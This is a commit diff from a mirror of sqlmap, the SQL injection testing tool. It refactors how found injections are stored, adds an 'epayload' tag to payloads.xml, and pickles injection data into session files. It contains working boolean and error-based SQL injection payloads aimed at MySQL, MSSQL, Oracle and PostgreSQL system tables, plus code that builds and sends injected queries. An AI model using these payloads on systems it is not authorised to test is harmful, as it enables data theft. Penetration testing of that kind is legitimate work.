mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-01-23 15:54:24 +03:00
Added tag <epayload> to the payloads.xml's <test> tag to define which payload to use when exploiting the test type.
Removed some useless tests. Moved <error> from queries.xml to payloads.xml as it makes more sense. Beeps at sql inj found only if --beep is provided. Minor fix in order to be able to pickle advancedDict() objects. Minor code refactoring. Removed useless folders.
This commit is contained in:
parent
c00ea7f5e5
commit
089c16a1b8
|
@ -33,6 +33,7 @@ from lib.core.datatype import injectionDict
|
||||||
from lib.core.enums import HTTPMETHOD
|
from lib.core.enums import HTTPMETHOD
|
||||||
from lib.core.enums import NULLCONNECTION
|
from lib.core.enums import NULLCONNECTION
|
||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
|
from lib.core.enums import PLACE
|
||||||
from lib.core.exception import sqlmapConnectionException
|
from lib.core.exception import sqlmapConnectionException
|
||||||
from lib.core.exception import sqlmapGenericException
|
from lib.core.exception import sqlmapGenericException
|
||||||
from lib.core.exception import sqlmapNoneDataException
|
from lib.core.exception import sqlmapNoneDataException
|
||||||
|
@ -331,14 +332,28 @@ def checkSqlInjection(place, parameter, value):
|
||||||
# Feed with the boundaries details only the first time a
|
# Feed with the boundaries details only the first time a
|
||||||
# test has been successful
|
# test has been successful
|
||||||
if injection.place is None or injection.parameter is None:
|
if injection.place is None or injection.parameter is None:
|
||||||
|
if place == PLACE.UA:
|
||||||
|
injection.parameter = conf.agent
|
||||||
|
else:
|
||||||
|
injection.parameter = parameter
|
||||||
|
|
||||||
injection.place = place
|
injection.place = place
|
||||||
injection.parameter = parameter
|
|
||||||
injection.ptype = ptype
|
injection.ptype = ptype
|
||||||
injection.prefix = prefix
|
injection.prefix = prefix
|
||||||
injection.suffix = suffix
|
injection.suffix = suffix
|
||||||
|
|
||||||
|
if "epayload" in test:
|
||||||
|
epayload = "%s%s" % (test.epayload, comment)
|
||||||
|
else:
|
||||||
|
epayload = None
|
||||||
|
|
||||||
# Feed with test details every time a test is successful
|
# Feed with test details every time a test is successful
|
||||||
injection.data[stype] = (title, agent.removePayloadDelimiters(reqPayload, False), where, comment)
|
injection.data[stype] = advancedDict()
|
||||||
|
injection.data[stype].title = title
|
||||||
|
injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload, False)
|
||||||
|
injection.data[stype].where = where
|
||||||
|
injection.data[stype].epayload = epayload
|
||||||
|
injection.data[stype].comment = comment
|
||||||
|
|
||||||
if "details" in test:
|
if "details" in test:
|
||||||
for detailKey, detailValue in test.details.items():
|
for detailKey, detailValue in test.details.items():
|
||||||
|
@ -351,7 +366,8 @@ def checkSqlInjection(place, parameter, value):
|
||||||
elif detailKey == "os" and injection.os is None:
|
elif detailKey == "os" and injection.os is None:
|
||||||
injection.os = detailValue
|
injection.os = detailValue
|
||||||
|
|
||||||
beep()
|
if conf.beep:
|
||||||
|
beep()
|
||||||
|
|
||||||
# There is no need to perform this test for other
|
# There is no need to perform this test for other
|
||||||
# <where> tags
|
# <where> tags
|
||||||
|
@ -703,7 +719,6 @@ def checkConnection(suppressOutput=False):
|
||||||
try:
|
try:
|
||||||
page, _ = Request.queryPage(content=True)
|
page, _ = Request.queryPage(content=True)
|
||||||
conf.seqMatcher.set_seq1(page)
|
conf.seqMatcher.set_seq1(page)
|
||||||
|
|
||||||
except sqlmapConnectionException, errMsg:
|
except sqlmapConnectionException, errMsg:
|
||||||
errMsg = getUnicode(errMsg)
|
errMsg = getUnicode(errMsg)
|
||||||
raise sqlmapConnectionException, errMsg
|
raise sqlmapConnectionException, errMsg
|
||||||
|
|
|
@ -107,10 +107,9 @@ def __formatInjection(inj):
|
||||||
data += "Parameter: %s\n" % inj.parameter
|
data += "Parameter: %s\n" % inj.parameter
|
||||||
|
|
||||||
for stype, sdata in inj.data.items():
|
for stype, sdata in inj.data.items():
|
||||||
stype = PAYLOAD.SQLINJECTION[stype] if isinstance(stype, int) else stype
|
|
||||||
data += " Type: %s\n" % stype
|
data += " Type: %s\n" % stype
|
||||||
data += " Title: %s\n" % sdata[0]
|
data += " Title: %s\n" % sdata.title
|
||||||
data += " Payload: %s\n\n" % sdata[1]
|
data += " Payload: %s\n\n" % sdata.payload
|
||||||
|
|
||||||
return data
|
return data
|
||||||
|
|
||||||
|
@ -136,7 +135,7 @@ def __saveToSessionFile():
|
||||||
parameter = inj.parameter
|
parameter = inj.parameter
|
||||||
|
|
||||||
for stype, sdata in inj.data.items():
|
for stype, sdata in inj.data.items():
|
||||||
payload = sdata[1]
|
payload = sdata.payload
|
||||||
|
|
||||||
if stype == 1:
|
if stype == 1:
|
||||||
kb.booleanTest = payload
|
kb.booleanTest = payload
|
||||||
|
@ -303,7 +302,8 @@ def start():
|
||||||
# TODO: consider the following line in __setRequestParams()
|
# TODO: consider the following line in __setRequestParams()
|
||||||
__testableParameters = True
|
__testableParameters = True
|
||||||
|
|
||||||
if not kb.injection.place or not kb.injection.parameter:
|
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
|
||||||
|
and (kb.injection.place is None or kb.injection.parameter is None):
|
||||||
if not conf.string and not conf.regexp and not conf.eRegexp:
|
if not conf.string and not conf.regexp and not conf.eRegexp:
|
||||||
# NOTE: this is not needed anymore, leaving only to display
|
# NOTE: this is not needed anymore, leaving only to display
|
||||||
# a warning message to the user in case the page is not stable
|
# a warning message to the user in case the page is not stable
|
||||||
|
@ -394,7 +394,7 @@ def start():
|
||||||
__showInjections()
|
__showInjections()
|
||||||
__selectInjection()
|
__selectInjection()
|
||||||
|
|
||||||
if kb.injection.place and kb.injection.parameter:
|
if kb.injection.place is not None and kb.injection.parameter is not None:
|
||||||
if conf.multipleTargets:
|
if conf.multipleTargets:
|
||||||
message = "do you want to exploit this SQL injection? [Y/n] "
|
message = "do you want to exploit this SQL injection? [Y/n] "
|
||||||
exploit = readInput(message, default="Y")
|
exploit = readInput(message, default="Y")
|
||||||
|
|
|
@ -158,6 +158,9 @@ class Agent:
|
||||||
return string
|
return string
|
||||||
|
|
||||||
def cleanupPayload(self, payload):
|
def cleanupPayload(self, payload):
|
||||||
|
if payload is None:
|
||||||
|
return
|
||||||
|
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
randInt1 = randomInt()
|
randInt1 = randomInt()
|
||||||
randStr = randomStr()
|
randStr = randomStr()
|
||||||
|
|
|
@ -37,7 +37,7 @@ class advancedDict(dict):
|
||||||
try:
|
try:
|
||||||
return self.__getitem__(item)
|
return self.__getitem__(item)
|
||||||
except KeyError:
|
except KeyError:
|
||||||
raise sqlmapDataException, "Unable to access item '%s'" % item
|
raise sqlmapDataException, "unable to access item '%s'" % item
|
||||||
|
|
||||||
def __setattr__(self, item, value):
|
def __setattr__(self, item, value):
|
||||||
"""
|
"""
|
||||||
|
@ -56,6 +56,12 @@ class advancedDict(dict):
|
||||||
else:
|
else:
|
||||||
self.__setitem__(item, value)
|
self.__setitem__(item, value)
|
||||||
|
|
||||||
|
def __getstate__(self):
|
||||||
|
return self.__dict__
|
||||||
|
|
||||||
|
def __setstate__(self, dict):
|
||||||
|
self.__dict__ = dict
|
||||||
|
|
||||||
def injectionDict():
|
def injectionDict():
|
||||||
injection = advancedDict()
|
injection = advancedDict()
|
||||||
|
|
||||||
|
|
|
@ -12,6 +12,8 @@ import re
|
||||||
from lib.core.common import dataToSessionFile
|
from lib.core.common import dataToSessionFile
|
||||||
from lib.core.common import formatFingerprintString
|
from lib.core.common import formatFingerprintString
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
|
from lib.core.convert import base64pickle
|
||||||
|
from lib.core.convert import base64unpickle
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
@ -78,30 +80,15 @@ def setInjection(inj):
|
||||||
session file.
|
session file.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if inj.place == PLACE.UA:
|
|
||||||
inj.parameter = conf.agent
|
|
||||||
|
|
||||||
condition = (
|
condition = (
|
||||||
( not kb.resumedQueries
|
( not kb.resumedQueries
|
||||||
or ( kb.resumedQueries.has_key(conf.url) and
|
or ( kb.resumedQueries.has_key(conf.url) and
|
||||||
( not kb.resumedQueries[conf.url].has_key("Injection point")
|
not kb.resumedQueries[conf.url].has_key("Injection data")
|
||||||
or not kb.resumedQueries[conf.url].has_key("Injection parameter")
|
) )
|
||||||
) ) )
|
|
||||||
)
|
)
|
||||||
|
|
||||||
if condition:
|
if condition:
|
||||||
dataToSessionFile("[%s][%s][%s][Injection point][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.place))
|
dataToSessionFile("[%s][%s][%s][Injection data][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), base64pickle(inj)))
|
||||||
dataToSessionFile("[%s][%s][%s][Injection parameter][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.parameter))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection parameter type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.PARAMETER[inj.ptype]))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection prefix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.prefix))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection suffix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.suffix))
|
|
||||||
|
|
||||||
for stype, sdata in inj.data.items():
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.SQLINJECTION[stype]))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection title][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[0]))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection payload][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[1]))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection where][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[2]))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection comment][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[3]))
|
|
||||||
|
|
||||||
def setDbms(dbms):
|
def setDbms(dbms):
|
||||||
"""
|
"""
|
||||||
|
@ -370,96 +357,11 @@ def resumeConfKb(expression, url, value):
|
||||||
except ValueError:
|
except ValueError:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
elif expression == "Injection point" and url == conf.url:
|
elif expression == "Injection data" and url == conf.url:
|
||||||
injPlace = value[:-1]
|
injection = base64unpickle(value[:-1])
|
||||||
|
kb.injections.append(injection)
|
||||||
|
|
||||||
logMsg = "resuming injection point '%s' from session file" % injPlace
|
logMsg = "resuming injection data"
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
if not conf.paramDict.has_key(injPlace):
|
|
||||||
warnMsg = "none of the parameters you provided "
|
|
||||||
warnMsg += "matches the resumable injection point. "
|
|
||||||
warnMsg += "sqlmap is going to reidentify the "
|
|
||||||
warnMsg += "injectable point"
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
else:
|
|
||||||
if kb.injection.place is not None and kb.injection.parameter is not None:
|
|
||||||
kb.injections.append(kb.injection)
|
|
||||||
kb.injection = injectionDict()
|
|
||||||
|
|
||||||
kb.injection.place = injPlace
|
|
||||||
|
|
||||||
elif expression == "Injection parameter" and url == conf.url:
|
|
||||||
injParameter = unSafeFormatString(value[:-1])
|
|
||||||
|
|
||||||
logMsg = "resuming injection parameter '%s' from session file" % injParameter
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
condition = (
|
|
||||||
not conf.paramDict.has_key(kb.injection.place) or
|
|
||||||
not conf.paramDict[kb.injection.place].has_key(injParameter)
|
|
||||||
)
|
|
||||||
|
|
||||||
if condition:
|
|
||||||
warnMsg = "none of the parameters you provided "
|
|
||||||
warnMsg += "matches the resumable injection parameter. "
|
|
||||||
warnMsg += "sqlmap is going to reidentify the "
|
|
||||||
warnMsg += "injectable point"
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
else:
|
|
||||||
kb.injection.parameter = injParameter
|
|
||||||
|
|
||||||
elif expression == "Injection parameter type" and url == conf.url:
|
|
||||||
kb.injection.ptype = unSafeFormatString(value[:-1])
|
|
||||||
|
|
||||||
logMsg = "resuming injection parameter type '%s' from session file" % kb.injection.ptype
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection prefix" and url == conf.url:
|
|
||||||
kb.injection.prefix = unSafeFormatString(value[:-1])
|
|
||||||
|
|
||||||
logMsg = "resuming injection prefix '%s' from session file" % kb.injection.prefix
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection suffix" and url == conf.url:
|
|
||||||
kb.injection.suffix = unSafeFormatString(value[:-1])
|
|
||||||
|
|
||||||
logMsg = "resuming injection suffix '%s' from session file" % kb.injection.suffix
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection type" and url == conf.url:
|
|
||||||
stype = unSafeFormatString(value[:-1])
|
|
||||||
kb.injection.data[stype] = []
|
|
||||||
|
|
||||||
logMsg = "resuming injection type '%s' from session file" % stype
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection title" and url == conf.url:
|
|
||||||
title = unSafeFormatString(value[:-1])
|
|
||||||
kb.injection.data[kb.injection.data.keys()[0]].append(title)
|
|
||||||
|
|
||||||
logMsg = "resuming injection title '%s' from session file" % title
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection payload" and url == conf.url:
|
|
||||||
payload = unSafeFormatString(value[:-1])
|
|
||||||
kb.injection.data[kb.injection.data.keys()[0]].append(payload)
|
|
||||||
|
|
||||||
logMsg = "resuming injection payload '%s' from session file" % payload
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection where" and url == conf.url:
|
|
||||||
where = unSafeFormatString(value[:-1])
|
|
||||||
kb.injection.data[kb.injection.data.keys()[0]].append(where)
|
|
||||||
|
|
||||||
logMsg = "resuming injection where '%s' from session file" % where
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection comment" and url == conf.url:
|
|
||||||
comment = unSafeFormatString(value[:-1])
|
|
||||||
kb.injection.data[kb.injection.data.keys()[0]].append(comment)
|
|
||||||
|
|
||||||
logMsg = "resuming injection comment '%s' from session file" % comment
|
|
||||||
logger.info(logMsg)
|
logger.info(logMsg)
|
||||||
|
|
||||||
elif expression == "Boolean-based blind injection" and url == conf.url:
|
elif expression == "Boolean-based blind injection" and url == conf.url:
|
||||||
|
|
|
@ -14,6 +14,9 @@ from lib.core.data import paths
|
||||||
from lib.core.datatype import advancedDict
|
from lib.core.datatype import advancedDict
|
||||||
|
|
||||||
def cleanupVals(values, tag):
|
def cleanupVals(values, tag):
|
||||||
|
if isinstance(values, basestring):
|
||||||
|
return values
|
||||||
|
|
||||||
count = 0
|
count = 0
|
||||||
|
|
||||||
for value in values:
|
for value in values:
|
||||||
|
@ -48,7 +51,7 @@ def parseXmlNode(node):
|
||||||
|
|
||||||
for child in element.getchildren():
|
for child in element.getchildren():
|
||||||
if child.text and child.text.strip():
|
if child.text and child.text.strip():
|
||||||
values = cleanupVals(child.text.split(','), child.tag)
|
values = cleanupVals(child.text.split(',') if child.tag != "epayload" else child.text, child.tag)
|
||||||
test[child.tag] = values
|
test[child.tag] = values
|
||||||
else:
|
else:
|
||||||
if len(child.getchildren()) == 0:
|
if len(child.getchildren()) == 0:
|
||||||
|
|
|
@ -401,8 +401,8 @@ def goStacked(expression, silent=False):
|
||||||
return direct(expression), None
|
return direct(expression), None
|
||||||
|
|
||||||
comment = queries[kb.dbms].comment.query
|
comment = queries[kb.dbms].comment.query
|
||||||
query = agent.prefixQuery("; %s" % expression)
|
query = agent.prefixQuery("; %s" % expression)
|
||||||
query = agent.suffixQuery("%s;%s" % (query, comment))
|
query = agent.suffixQuery("%s;%s" % (query, comment))
|
||||||
|
|
||||||
debugMsg = "query: %s" % query
|
debugMsg = "query: %s" % query
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
@ -412,7 +412,7 @@ def goStacked(expression, silent=False):
|
||||||
|
|
||||||
return payload, page
|
return payload, page
|
||||||
|
|
||||||
def goError(expression, suppressOutput=False, returnPayload=False):
|
def goError(expression, suppressOutput=False):
|
||||||
"""
|
"""
|
||||||
Retrieve the output of a SQL query taking advantage of an error-based
|
Retrieve the output of a SQL query taking advantage of an error-based
|
||||||
SQL injection vulnerability on the affected parameter.
|
SQL injection vulnerability on the affected parameter.
|
||||||
|
@ -436,10 +436,8 @@ def goError(expression, suppressOutput=False, returnPayload=False):
|
||||||
result = resume(expression, None)
|
result = resume(expression, None)
|
||||||
|
|
||||||
if not result:
|
if not result:
|
||||||
result = errorUse(expression, returnPayload)
|
result = errorUse(expression)
|
||||||
|
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
|
||||||
if not returnPayload:
|
|
||||||
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
|
|
||||||
|
|
||||||
if suppressOutput:
|
if suppressOutput:
|
||||||
conf.verbose = popValue()
|
conf.verbose = popValue()
|
||||||
|
|
|
@ -28,45 +28,37 @@ from lib.utils.resume import resume
|
||||||
from lib.core.settings import ERROR_SPACE
|
from lib.core.settings import ERROR_SPACE
|
||||||
from lib.core.settings import ERROR_EMPTY_CHAR
|
from lib.core.settings import ERROR_EMPTY_CHAR
|
||||||
|
|
||||||
def errorUse(expression, returnPayload=False):
|
def errorUse(expression):
|
||||||
"""
|
"""
|
||||||
Retrieve the output of a SQL query taking advantage of an error SQL
|
Retrieve the output of a SQL query taking advantage of an error SQL
|
||||||
injection vulnerability on the affected parameter.
|
injection vulnerability on the affected parameter.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
output = None
|
output = None
|
||||||
logic = conf.logic
|
randInt = randomInt(1)
|
||||||
randInt = randomInt(1)
|
query = agent.cleanupPayload(kb.injection.data[2].epayload)
|
||||||
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
|
query = agent.prefixQuery(query)
|
||||||
query = agent.suffixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
startLimiter = ""
|
check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
|
||||||
endLimiter = ""
|
|
||||||
|
|
||||||
expressionUnescaped = expression
|
expressionUnescaped = expression
|
||||||
|
|
||||||
if kb.dbmsDetected:
|
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
|
||||||
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
|
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
||||||
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
|
||||||
|
|
||||||
if kb.dbms == DBMS.MYSQL:
|
if kb.dbms == DBMS.MYSQL:
|
||||||
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
|
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
|
||||||
|
|
||||||
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
expression = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
||||||
expressionUnescaped = unescaper.unescape(expressionReplaced)
|
expression = safeStringFormat(query, expression)
|
||||||
startLimiter = unescaper.unescape("'%s'" % kb.misc.start)
|
expression = unescaper.unescape(expression)
|
||||||
endLimiter = unescaper.unescape("'%s'" % kb.misc.stop)
|
|
||||||
else:
|
|
||||||
expressionUnescaped = kb.misc.handler.unescape(expression)
|
|
||||||
startLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.start)
|
|
||||||
endLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.stop)
|
|
||||||
|
|
||||||
forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
|
debugMsg = "query: %s" % expression
|
||||||
debugMsg = "query: %s" % forgedQuery
|
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
payload = agent.payload(newValue=forgedQuery)
|
payload = agent.payload(newValue=expression)
|
||||||
result = Request.queryPage(payload, content=True)
|
reqBody, _ = Request.queryPage(payload, content=True)
|
||||||
match = re.search('%s(?P<result>.*?)%s' % (kb.misc.start, kb.misc.stop), result[0], re.DOTALL | re.IGNORECASE)
|
match = re.search(check, reqBody, re.DOTALL | re.IGNORECASE)
|
||||||
|
|
||||||
if match:
|
if match:
|
||||||
output = match.group('result')
|
output = match.group('result')
|
||||||
|
@ -78,7 +70,4 @@ def errorUse(expression, returnPayload=False):
|
||||||
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
|
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
if returnPayload:
|
return output
|
||||||
return output, payload
|
|
||||||
else:
|
|
||||||
return output
|
|
||||||
|
|
|
@ -1,10 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
"""
|
|
||||||
$Id$
|
|
||||||
|
|
||||||
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
|
||||||
See the file 'doc/COPYING' for copying permission
|
|
||||||
"""
|
|
||||||
|
|
||||||
pass
|
|
|
@ -126,6 +126,9 @@ Tag: <test>
|
||||||
original value to its negative representation
|
original value to its negative representation
|
||||||
3: Replace the parameter original value
|
3: Replace the parameter original value
|
||||||
|
|
||||||
|
Sub-tag: <epayload>
|
||||||
|
The payload that will be used to exploit the injection point.
|
||||||
|
|
||||||
Sub-tag: <request>
|
Sub-tag: <request>
|
||||||
What to inject for this test.
|
What to inject for this test.
|
||||||
|
|
||||||
|
@ -187,6 +190,7 @@ Formats:
|
||||||
<risk></risk>
|
<risk></risk>
|
||||||
<clause></clause>
|
<clause></clause>
|
||||||
<where></where>
|
<where></where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload></payload>
|
<payload></payload>
|
||||||
<comment></comment>
|
<comment></comment>
|
||||||
|
@ -403,6 +407,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -418,6 +423,7 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR [RANDNUM]=[RANDNUM]</payload>
|
<payload>OR [RANDNUM]=[RANDNUM]</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -436,6 +442,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -455,6 +462,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -473,6 +481,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -491,6 +500,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -511,6 +521,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -526,6 +537,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -545,6 +557,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -563,6 +576,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -581,6 +595,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -601,6 +616,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
